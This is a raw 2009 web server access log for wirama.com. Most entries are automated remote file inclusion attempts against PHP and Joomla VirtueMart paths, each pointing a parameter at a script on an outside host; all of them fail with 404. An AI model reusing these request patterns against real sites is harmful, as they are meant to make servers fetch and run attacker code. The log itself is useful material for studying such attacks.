211.218.40.180 - - [01/Sep/2009:21:13:26 -0700] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.218.40.180 - - [01/Sep/2009:21:13:26 -0700] "GET /logs/access_090401.log/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
211.218.40.180 - - [01/Sep/2009:21:14:07 -0700] "GET /logs/access_090601.log/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.120 - - [01/Sep/2009:21:14:11 -0700] "GET /logs/access_090801.log//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.120 - - [01/Sep/2009:21:14:16 -0700] "GET /logs/access_090329.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
218.150.85.170 - - [01/Sep/2009:21:14:36 -0700] "GET /logs//cache/errors.php?error=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
218.150.85.170 - - [01/Sep/2009:21:14:36 -0700] "GET /cache/errors.php?error=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "wirama.com"
222.122.72.216 - - [01/Sep/2009:21:14:41 -0700] "GET /logs/access_090401.log/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:21:14:41 -0700] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:21:14:41 -0700] "GET /logs/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
188.120.32.42 - - [01/Sep/2009:21:14:50 -0700] "GET /logs/access_090401.log/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
188.120.32.42 - - [01/Sep/2009:21:14:50 -0700] "GET /logs/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
188.120.32.42 - - [01/Sep/2009:21:14:50 -0700] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.122.72.216 - - [01/Sep/2009:21:15:30 -0700] "GET /logs/access_090601.log/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
188.120.32.42 - - [01/Sep/2009:21:15:33 -0700] "GET /logs/access_090601.log/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.bellasbar.co.za//templates_c/5.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:21:16:49 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:21:16:50 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:21:16:58 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.120 - - [01/Sep/2009:21:17:08 -0700] "GET /cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.120 - - [01/Sep/2009:21:17:08 -0700] "GET /logs//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.120 - - [01/Sep/2009:21:17:08 -0700] "GET /logs/access_090331.log//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
213.0.87.120 - - [01/Sep/2009:21:18:36 -0700] "GET /logs//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:21:18:36 -0700] "GET /cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:21:18:36 -0700] "GET /logs/access_090331.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
213.0.87.120 - - [01/Sep/2009:21:20:32 -0700] "GET /logs/access_090329.log%20%20//cache/errors.php?error=http://suechristian.com/gallery/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:20:49 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:20:50 -0700] "GET /logs/access_090701.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:20:50 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:21:21:17 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:21:21:17 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:21:21:17 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:21:21:20 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:21:21:20 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:21:21:20 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:21:22:58 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:21:22:58 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:21:22:58 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:30:10 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:31:01 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:31:01 -0700] "GET /logs/access_090701.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:31:01 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.182 - - [01/Sep/2009:21:34:31 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.182 - - [01/Sep/2009:21:34:31 -0700] "GET /skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.182 - - [01/Sep/2009:21:34:31 -0700] "GET /logs/access_090531.log//skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.182 - - [01/Sep/2009:21:34:34 -0700] "GET /skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.182 - - [01/Sep/2009:21:34:34 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.182 - - [01/Sep/2009:21:34:34 -0700] "GET /logs/access_090531.log//skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.182 - - [01/Sep/2009:21:42:11 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.182 - - [01/Sep/2009:21:42:19 -0700] "GET /logs/access.log%20%20//skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.182 - - [01/Sep/2009:21:42:28 -0700] "GET /logs/access_090531.log%20%20//skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
222.236.47.182 - - [01/Sep/2009:21:42:31 -0700] "GET /logs/access_090531.log%20%20//skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:21:44:35 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:21:44:35 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:21:44:35 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:45:53 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:21:46:05 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:21:46:05 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:21:46:05 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:13 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:13 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:13 -0700] "GET /logs/access_090701.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:18 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:18 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:18 -0700] "GET /logs/access_090701.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:32 -0700] "GET /logs/access_090701.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:32 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:32 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:39 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:39 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:39 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:48 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:50 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:50 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:48:50 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:49:10 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.30.87.93 - - [01/Sep/2009:21:49:45 -0700] "GET /?N=D HTTP/1.0" 200 900 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:50:42 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:50:46 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:50:46 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:21:50:46 -0700] "GET /logs/access_090701.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:21:50:46 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:21:50:46 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:21:50:52 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:21:50:52 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:21:50:52 -0700] "GET /logs/access_090701.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:51:00 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:51:00 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:51:00 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.184.252.3 - - [01/Sep/2009:21:51:18 -0700] "GET /logs/access_090701.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:21:51:18 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:21:51:26 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:52:04 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:53:43 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:53:43 -0700] "GET /logs/access_090701.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:53:43 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:54:19 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:54:20 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
72.30.87.93 - - [01/Sep/2009:21:54:21 -0700] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:54:39 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:54:39 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:54:47 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:54:47 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:54:47 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:54:57 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:21:55:12 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:21:55:13 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:21:55:26 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:55:49 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:55:49 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:55:49 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
